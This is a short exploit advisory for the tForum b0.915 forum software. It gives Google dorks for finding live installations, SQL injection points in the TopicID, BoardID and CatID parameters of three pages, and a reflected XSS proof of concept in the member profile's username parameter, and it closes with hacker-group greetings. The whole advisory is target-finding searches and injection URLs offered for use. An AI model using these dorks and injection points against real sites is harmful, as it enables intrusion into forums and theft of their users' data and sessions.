# Exploit Title: tForum b0.915 Vulnerabilities
# Dork: intext:"powered by tForum b0.915"
# Author: snup
# Contact: snup.php@gmail.com

 SQL Injection:

 DORK:
  inurl:"viewtopic.php?TopicID=" intext:"powered by tForum b0.915"
  inurl:"viewboard.php?BoardID=" intext:"powered by tForum b0.915"
  inurl:"viewcat.php?CatID=" intext:"powered by tForum b0.915"

 BUG:
  http://127.0.0.1/viewtopic.php?TopicID=[sqli]
  http://127.0.0.1/viewboard.php?BoardID=[sqli]
  http://127.0.0.1/viewcat.php?CatID=[sqli]

 XSS:

 DORK:
  inurl:"username=" intext:"powered by tForum b0.915"

 BUG:
  http://127.0.0.1/member.php?Action=viewprofile&username=<script>alert(1337)</script>

===========
= Gr33tz: =
====================================================
= agilob, cOnd, czoik, drummachina, gocys, prick   =
= im2ee, MadCow, n1k0n3r, R3w, rtgn, SiD, vizzdoom =
=           irc.freenode.net #pakamera                       =
====================================================